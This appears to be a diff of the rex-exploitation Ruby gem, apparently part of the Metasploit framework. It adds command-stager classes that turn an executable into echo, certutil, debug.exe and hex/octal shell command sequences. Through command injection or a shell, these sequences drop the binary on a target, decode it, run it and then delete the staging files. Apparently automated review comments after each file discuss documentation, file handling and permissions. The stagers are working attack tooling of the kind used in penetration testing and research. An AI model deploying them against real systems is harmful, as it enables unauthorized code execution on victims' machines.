rex-exploitation 0.1.0
- checksums.yaml +7 -0
- checksums.yaml.gz.sig +0 -0
- data.tar.gz.sig +1 -0
- data/.gitignore +9 -0
- data/.rspec +2 -0
- data/.travis.yml +5 -0
- data/CODE_OF_CONDUCT.md +74 -0
- data/Gemfile +4 -0
- data/README.md +33 -0
- data/Rakefile +6 -0
- data/bin/console +14 -0
- data/bin/setup +8 -0
- data/data/exploits/cmdstager/debug_asm +91 -0
- data/data/exploits/cmdstager/debug_write +819 -0
- data/data/exploits/cmdstager/vbs_b64 +40 -0
- data/data/exploits/cmdstager/vbs_b64_adodb +50 -0
- data/data/exploits/cmdstager/vbs_b64_noquot +49 -0
- data/data/exploits/cmdstager/vbs_b64_sleep +41 -0
- data/data/js/detect/ie_addons.js +89 -0
- data/data/js/detect/misc_addons.js +157 -0
- data/data/js/detect/os.js +831 -0
- data/data/js/memory/explib2/lib/explib2.js +426 -0
- data/data/js/memory/explib2/payload/drop_exec.js +33 -0
- data/data/js/memory/explib2/payload/exec.js +10 -0
- data/data/js/memory/heap_spray.js +17 -0
- data/data/js/memory/heaplib2.js +192 -0
- data/data/js/memory/mstime_malloc.js +31 -0
- data/data/js/memory/property_spray.js +38 -0
- data/data/js/network/ajax_download.js +18 -0
- data/data/js/network/ajax_post.js +18 -0
- data/data/js/network/xhr_shim.js +15 -0
- data/data/js/utils/base64.js +126 -0
- data/data/ropdb/flash.xml +80 -0
- data/data/ropdb/hxds.xml +66 -0
- data/data/ropdb/java.xml +33 -0
- data/data/ropdb/msvcrt.xml +71 -0
- data/data/ropdb/reader.xml +132 -0
- data/data/ropdb/samba.xml +436 -0
- data/data/ropdb/stagefright.xml +225 -0
- data/lib/rex/exploitation.rb +7 -0
- data/lib/rex/exploitation/cmdstager.rb +11 -0
- data/lib/rex/exploitation/cmdstager/base.rb +189 -0
- data/lib/rex/exploitation/cmdstager/bourne.rb +118 -0
- data/lib/rex/exploitation/cmdstager/certutil.rb +114 -0
- data/lib/rex/exploitation/cmdstager/debug_asm.rb +139 -0
- data/lib/rex/exploitation/cmdstager/debug_write.rb +133 -0
- data/lib/rex/exploitation/cmdstager/echo.rb +166 -0
- data/lib/rex/exploitation/cmdstager/printf.rb +121 -0
- data/lib/rex/exploitation/cmdstager/tftp.rb +70 -0
- data/lib/rex/exploitation/cmdstager/vbs.rb +125 -0
- data/lib/rex/exploitation/egghunter.rb +423 -0
- data/lib/rex/exploitation/encryptjs.rb +79 -0
- data/lib/rex/exploitation/heaplib.js.b64 +331 -0
- data/lib/rex/exploitation/heaplib.rb +107 -0
- data/lib/rex/exploitation/js.rb +6 -0
- data/lib/rex/exploitation/js/detect.rb +70 -0
- data/lib/rex/exploitation/js/memory.rb +80 -0
- data/lib/rex/exploitation/js/network.rb +83 -0
- data/lib/rex/exploitation/js/utils.rb +32 -0
- data/lib/rex/exploitation/jsobfu.rb +17 -0
- data/lib/rex/exploitation/obfuscatejs.rb +336 -0
- data/lib/rex/exploitation/omelet.rb +321 -0
- data/lib/rex/exploitation/opcodedb.rb +819 -0
- data/lib/rex/exploitation/ropdb.rb +190 -0
- data/lib/rex/exploitation/seh.rb +93 -0
- data/lib/rex/exploitation/version.rb +5 -0
- data/rex-exploitation.gemspec +35 -0
- metadata +298 -0
- metadata.gz.sig +0 -0
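--- a/data/lib/rex/exploitation/cmdstager/certutil.rb
+++ b/data/lib/rex/exploitation/cmdstager/certutil.rb
@@ -0,0 +1,114 @@
+# -*- coding: binary -*-
+
+require 'rex/text'
+require 'rex/arch'
+
+module Rex
+module Exploitation
+
+###
+#
+# This class provides the ability to create a sequence of commands from an executable.
+# When this sequence is ran via command injection or a shell, the resulting exe will
+# be written to disk and executed.
+#
+# This particular version uses Windows certutil to base64 decode a file,
+# created via echo >>, and decode it to the final binary.
+#
+#
+# Written by xistence
+# Original discovery by @mattifestation - https://gist.github.com/mattifestation/47f9e8a431f96a266522
+#
+###
+
+class CmdStagerCertutil < CmdStagerBase
+
+def initialize(exe)
+super
+
+@var_encoded = Rex::Text.rand_text_alpha(5)
+@var_decoded = Rex::Text.rand_text_alpha(5)
+@decoder = nil # filled in later
+end
+
+
+# Override just to set the extra byte count
+# @param opts [Array] The options to generate the command line
+# @return [Array] The complete command line
+def generate_cmds(opts)
+# Set the start/end of the commands here (vs initialize) so we have @tempdir
+@cmd_start = "echo "
+@cmd_end = ">>#{@tempdir}#{@var_encoded}.b64"
+xtra_len = @cmd_start.length + @cmd_end.length + 1
+opts.merge!({ :extra => xtra_len })
+super
+end
+
+
+# Simple base64 encoder for the executable
+# @param opts [Array] The options to generate the command line
+# @return [String] Base64 encoded executable
+def encode_payload(opts)
+Rex::Text.encode_base64(@exe)
+end
+
+
+# Combine the parts of the encoded file with the stuff that goes
+# before / after it.
+# @param parts [Array] Splitted commands
+# @param opts [Array] The options to generate the command line
+# @return [Array] The command line
+def parts_to_commands(parts, opts)
+
+cmds = []
+parts.each do |p|
+cmd = ''
+cmd << @cmd_start
+cmd << p
+cmd << @cmd_end
+cmds << cmd
+end
+
+cmds
+end
+
+
+# Generate the commands that will decode the file we just created
+# @param opts [Array] The options to generate the command line
+# @return [Array] The certutil Base64 decoder part of the command line
+def generate_cmds_decoder(opts)
+
+cmds = []
+cmds << "certutil -decode #{@tempdir}#{@var_encoded}.b64 #{@tempdir}#{@var_decoded}.exe"
+return cmds
+end
+
+
+# We override compress commands just to stick in a few extra commands
+# last second..
+# @param cmds [Array] Complete command line
+# @param opts [Array] Extra options for command line generation
+# @return [Array] The complete command line including cleanup
+def compress_commands(cmds, opts)
+# Make it all happen
+cmds << "#{@tempdir}#{@var_decoded}.exe"
+
+# Clean up after unless requested not to..
+if (not opts[:nodelete])
+cmds << "del #{@tempdir}#{@var_encoded}.b64"
+# NOTE: We won't be able to delete the exe while it's in use.
+end
+
+super
+end
+
+# Windows uses & to concat strings
+#
+# @return [String] Concat operator
+def cmd_concat_operator
+" & "
+end
+
+end
+end
+end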
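Review bot: The YARD tags on every method declare `opts` as `[Array]`, but the code uses it as a Hash (`opts.merge!({ :extra => xtra_len })` in generate_cmds, `opts[:nodelete]` in compress_commands); they should read `# @param opts [Hash] The options to generate the command line`. `@decoder = nil # filled in later` in initialize is never read or assigned again in this file and could be dropped. The class comment should also state that the decoded `.exe` stays in `@tempdir` after the run, since only the `.b64` is deleted, so whoever runs an assessment with this knows there is an artefact to remove and record.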
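--- a/data/lib/rex/exploitation/cmdstager/debug_asm.rb
+++ b/data/lib/rex/exploitation/cmdstager/debug_asm.rb
@@ -0,0 +1,139 @@
+# -*- coding: binary -*-
+
+require 'rex/text'
+require 'rex/arch'
+
+module Rex
+module Exploitation
+
+###
+#
+# This class provides the ability to create a sequence of commands from an executable.
+# When this sequence is ran via command injection or a shell, the resulting exe will
+# be written to disk and executed.
+#
+# This particular version uses debug.exe to assemble a small COM file. The COM will
+# take a hex-ascii file, created via echo >>, and decode it to the final binary.
+#
+# Requires: debug.exe
+#
+# Written by Joshua J. Drake
+#
+###
+
+class CmdStagerDebugAsm < CmdStagerBase
+
+def initialize(exe)
+super
+
+@var_decoder_asm = Rex::Text.rand_text_alpha(8) + ".dat"
+@var_decoder_com = Rex::Text.rand_text_alpha(8) + ".com"
+@var_payload_in = Rex::Text.rand_text_alpha(8) + ".dat"
+@var_payload_out = Rex::Text.rand_text_alpha(8) + ".exe"
+@decoder = nil # filled in later
+end
+
+
+#
+# Override just to set the extra byte count
+#
+def generate_cmds(opts)
+# Set the start/end of the commands here (vs initialize) so we have @tempdir
+@cmd_start = "echo "
+@cmd_end = ">>#{@tempdir}#{@var_payload_in}"
+xtra_len = @cmd_start.length + @cmd_end.length + 1
+opts.merge!({ :extra => xtra_len })
+super
+end
+
+
+#
+# Simple hex encoding...
+#
+def encode_payload(opts)
+ret = @exe.unpack('H*')[0]
+end
+
+
+#
+# Combine the parts of the encoded file with the stuff that goes
+# before / after it.
+#
+def parts_to_commands(parts, opts)
+
+cmds = []
+parts.each do |p|
+cmd = ''
+cmd << @cmd_start
+cmd << p
+cmd << @cmd_end
+cmds << cmd
+end
+
+cmds
+end
+
+
+#
+# Generate the commands that will decode the file we just created
+#
+def generate_cmds_decoder(opts)
+
+# Allow decoder stub override (needs to input base64 and output bin)
+@decoder = opts[:decoder] if (opts[:decoder])
+
+# Read the decoder data file
+f = File.new(@decoder, "rb")
+decoder = f.read(f.stat.size)
+f.close
+
+# Replace variables
+decoder.gsub!(/decoder_stub/, "#{@tempdir}#{@var_decoder_asm}")
+decoder.gsub!(/h2b\.com/, "#{@tempdir}#{@var_decoder_com}")
+# NOTE: these two filenames MUST 8+3 chars long.
+decoder.gsub!(/testfile\.dat/, "#{@var_payload_in}")
+decoder.gsub!(/testfile\.out/, "#{@var_payload_out}")
+
+# Split it apart by the lines
+decoder.split("\n")
+end
+
+
+#
+# We override compress commands just to stick in a few extra commands
+# last second..
+#
+def compress_commands(cmds, opts)
+# Convert the debug script to an executable...
+cvt_cmd = ''
+if (@tempdir != '')
+cvt_cmd << "cd %TEMP% && "
+end
+cvt_cmd << "debug < #{@tempdir}#{@var_decoder_asm}"
+cmds << cvt_cmd
+
+# Convert the encoded payload...
+cmds << "#{@tempdir}#{@var_decoder_com}"
+
+# Make it all happen
+cmds << "start #{@tempdir}#{@var_payload_out}"
+
+# Clean up after unless requested not to..
+if (not opts[:nodelete])
+cmds << "del #{@tempdir}#{@var_decoder_asm}"
+cmds << "del #{@tempdir}#{@var_decoder_com}"
+cmds << "del #{@tempdir}#{@var_payload_in}"
+# XXX: We won't be able to delete the payload while it is running..
+end
+
+super
+end
+
+# Windows uses & to concat strings
+def cmd_concat_operator
+" & "
+end
+
+end
+end
+end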
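Review bot: generate_cmds_decoder opens the stub with `File.new(@decoder, "rb")` and closes it by hand, so the handle leaks if `read` raises. When no `opts[:decoder]` is passed, `@decoder` is still the nil set in initialize and `File.new` fails with a bare TypeError, unless a caller outside this file always supplies it. `raise ArgumentError, 'decoder stub path required' unless @decoder` followed by `decoder = File.binread(@decoder)` covers both cases. The same three lines appear in generate_cmds_decoder in debug_write.rb. In encode_payload the local `ret` is assigned and never used; `@exe.unpack('H*')[0]` alone is enough.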
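--- a/data/lib/rex/exploitation/cmdstager/debug_write.rb
+++ b/data/lib/rex/exploitation/cmdstager/debug_write.rb
@@ -0,0 +1,133 @@
+# -*- coding: binary -*-
+
+require 'rex/text'
+require 'rex/arch'
+
+module Rex
+module Exploitation
+
+###
+#
+# This class provides the ability to create a sequence of commands from an executable.
+# When this sequence is ran via command injection or a shell, the resulting exe will
+# be written to disk and executed.
+#
+# This particular version uses debug.exe to write a small .NET binary. That binary will
+# take a hex-ascii file, created via echo >>, and decode it to the final binary.
+#
+# Requires: .NET, debug.exe
+#
+###
+
+class CmdStagerDebugWrite < CmdStagerBase
+
+def initialize(exe)
+super
+
+@var_bypass = Rex::Text.rand_text_alpha(8)
+@var_payload = Rex::Text.rand_text_alpha(8)
+@decoder = nil # filled in later
+end
+
+
+#
+# Override just to set the extra byte count
+#
+def generate_cmds(opts)
+# Set the start/end of the commands here (vs initialize) so we have @tempdir
+@cmd_start = "echo "
+@cmd_end = ">>#{@tempdir}#{@var_payload}"
+xtra_len = @cmd_start.length + @cmd_end.length + 1
+opts.merge!({ :extra => xtra_len })
+super
+end
+
+
+#
+# Simple hex encoding...
+#
+def encode_payload(opts)
+@exe.unpack('H*')[0]
+end
+
+
+#
+# Combine the parts of the encoded file with the stuff that goes
+# before / after it.
+#
+def parts_to_commands(parts, opts)
+
+cmds = []
+parts.each do |p|
+cmd = ''
+cmd << @cmd_start
+cmd << p
+cmd << @cmd_end
+cmds << cmd
+end
+
+cmds
+end
+
+
+#
+# Generate the commands that will decode the file we just created
+#
+def generate_cmds_decoder(opts)
+
+# Allow decoder stub override (needs to input base64 and output bin)
+@decoder = opts[:decoder] if (opts[:decoder])
+
+# Read the decoder data file
+f = File.new(@decoder, "rb")
+decoder = f.read(f.stat.size)
+f.close
+
+# Replace variables
+decoder.gsub!(/decoder_stub/, "#{@tempdir}#{@var_bypass}")
+
+# Split it apart by the lines
+decoder.split("\n")
+end
+
+
+#
+# We override compress commands just to stick in a few extra commands
+# last second..
+#
+def compress_commands(cmds, opts)
+# Convert the debug script to an executable...
+cvt_cmd = ''
+if (@tempdir != '')
+cvt_cmd << "cd %TEMP% && "
+end
+cvt_cmd << "debug < #{@tempdir}#{@var_bypass}"
+cmds << cvt_cmd
+
+# Rename the resulting binary
+cmds << "move #{@tempdir}#{@var_bypass}.bin #{@tempdir}#{@var_bypass}.exe"
+
+# Converting the encoded payload...
+cmds << "#{@tempdir}#{@var_bypass}.exe #{@tempdir}#{@var_payload}"
+
+# Make it all happen
+cmds << "start #{@tempdir}#{@var_payload}.exe"
+
+# Clean up after unless requested not to..
+if (not opts[:nodelete])
+cmds << "del #{@tempdir}#{@var_bypass}.exe"
+cmds << "del #{@tempdir}#{@var_payload}"
+# XXX: We won't be able to delete the payload while it is running..
+end
+
+super
+end
+
+# Windows uses & to concat strings
+def cmd_concat_operator
+" & "
+end
+
+end
+end
+end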
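Review bot: The comment `# Allow decoder stub override (needs to input base64 and output bin)` in generate_cmds_decoder contradicts the rest of the file: the class header says the stub takes a hex-ascii file, and encode_payload produces hex with `unpack('H*')`. It should read `# Allow decoder stub override (needs to input hex-ascii and output bin)`; debug_asm.rb carries the same stale comment. The methods here also lack the `@param`/`@return` tags that certutil.rb has, and `opts` should be documented as a Hash with the keys this file reads (`:decoder`, `:nodelete`).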
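--- a/data/lib/rex/exploitation/cmdstager/echo.rb
+++ b/data/lib/rex/exploitation/cmdstager/echo.rb
@@ -0,0 +1,166 @@
+# -*- coding: binary -*-
+
+require 'rex/text'
+require 'rex/arch'
+require 'shellwords'
+
+module Rex
+module Exploitation
+
+class CmdStagerEcho < CmdStagerBase
+
+ENCODINGS = {
+'hex' => "\\\\x",
+'octal' => "\\\\"
+}
+
+def initialize(exe)
+super
+
+@var_elf = Rex::Text.rand_text_alpha(5)
+end
+
+#
+# Override to ensure opts[:temp] is a correct *nix path
+# and initialize opts[:enc_format].
+#
+def generate(opts = {})
+opts[:temp] = opts[:temp] || '/tmp/'
+
+unless opts[:temp].empty?
+opts[:temp].gsub!(/\\/, '/')
+opts[:temp] = opts[:temp].shellescape
+opts[:temp] << '/' if opts[:temp][-1,1] != '/'
+end
+
+# by default use the 'hex' encoding
+opts[:enc_format] = opts[:enc_format].nil? ? 'hex' : opts[:enc_format].to_s
+
+unless ENCODINGS.keys.include?(opts[:enc_format])
+raise RuntimeError, "CmdStagerEcho - Invalid Encoding Option: #{opts[:enc_format]}"
+end
+
+super
+end
+
+#
+# Override to set the extra byte count
+#
+def generate_cmds(opts)
+# Set the start/end of the commands here (vs initialize) so we have @tempdir
+@cmd_start = "echo "
+unless opts[:noargs]
+@cmd_start += "-en "
+end
+
+@cmd_end = ">>#{@tempdir}#{@var_elf}"
+xtra_len = @cmd_start.length + @cmd_end.length
+opts.merge!({ :extra => xtra_len })
+
+@prefix = opts[:prefix] || ENCODINGS[opts[:enc_format]]
+min_part_size = 5 # for both encodings
+
+if (opts[:linemax] - opts[:extra]) < min_part_size
+raise RuntimeError, "CmdStagerEcho - Not enough space for command - #{opts[:extra] + min_part_size} byte required, #{opts[:linemax]} byte available"
+end
+
+super
+end
+
+
+#
+# Encode into a format that echo understands, where
+# interpretation of backslash escapes are enabled. For
+# hex, it'll look like "\\x41\\x42", and octal will be
+# "\\101\\102\\5\\41"
+#
+def encode_payload(opts)
+case opts[:enc_format]
+when 'octal'
+return Rex::Text.to_octal(@exe, @prefix)
+else
+return Rex::Text.to_hex(@exe, @prefix)
+end
+end
+
+
+#
+# Combine the parts of the encoded file with the stuff that goes
+# before ("echo -en ") / after (">>file") it.
+#
+def parts_to_commands(parts, opts)
+parts.map do |p|
+cmd = ''
+cmd << @cmd_start
+cmd << p
+cmd << @cmd_end
+cmd
+end
+end
+
+#
+# Since the binary has been already dropped to fs, just execute and
+# delete it
+#
+def generate_cmds_decoder(opts)
+cmds = []
+# Make it all happen
+cmds << "chmod 777 #{@tempdir}#{@var_elf}"
+#cmds << "chmod +x #{@tempdir}#{@var_elf}"
+cmds << "#{@tempdir}#{@var_elf}#{' & echo' if opts[:background]}"
+
+# Clean up after unless requested not to..
+unless opts[:nodelete]
+cmds << "rm -f #{@tempdir}#{@var_elf}"
+end
+
+return cmds
+end
+
+#
+# Override it to ensure that the hex representation of a byte isn't cut
+#
+def slice_up_payload(encoded, opts)
+encoded_dup = encoded.dup
+
+parts = []
+xtra_len = opts[:extra]
+xtra_len ||= 0
+while (encoded_dup.length > 0)
+temp = encoded_dup.slice(0, (opts[:linemax] - xtra_len))
+# cut the end of the part until we reach the start
+# of a full byte representation "\\xYZ" or "\\YZX"
+temp = fix_last_byte(temp, opts, encoded_dup)
+parts << temp
+encoded_dup.slice!(0, temp.length)
+end
+
+parts
+end
+
+def fix_last_byte(part, opts, remaining="")
+fixed_part = part.dup
+
+case opts[:enc_format]
+when 'hex'
+while (fixed_part.length > 0 && fixed_part[-5, @prefix.length] != @prefix)
+fixed_part.chop!
+end
+when 'octal'
+if remaining.length > fixed_part.length and remaining[fixed_part.length, @prefix.length] != @prefix
+pos = fixed_part.rindex('\\')
+pos -= 1 if fixed_part[pos-1] == '\\'
+fixed_part.slice!(pos..fixed_part.length-1)
+end
+end
+
+return fixed_part
+end
+
+def cmd_concat_operator
+" ; "
+end
+
+end
+end
+end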
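Review bot: `chmod 777` in generate_cmds_decoder leaves the dropped file world-writable for as long as it exists, so any other local account on the host can modify or replace it before it runs or is removed. The next command only needs owner execute permission, e.g. `cmds << "chmod 700 #{@tempdir}#{@var_elf}"`; the commented-out `chmod +x` line suggests a narrower mode was already considered. Separately, fix_last_byte hard-codes `-5` in the hex branch while generate_cmds accepts an `opts[:prefix]` override, so the offset only holds for the default three-character prefix; `fixed_part[-(@prefix.length + 2), @prefix.length]` keeps the two in step.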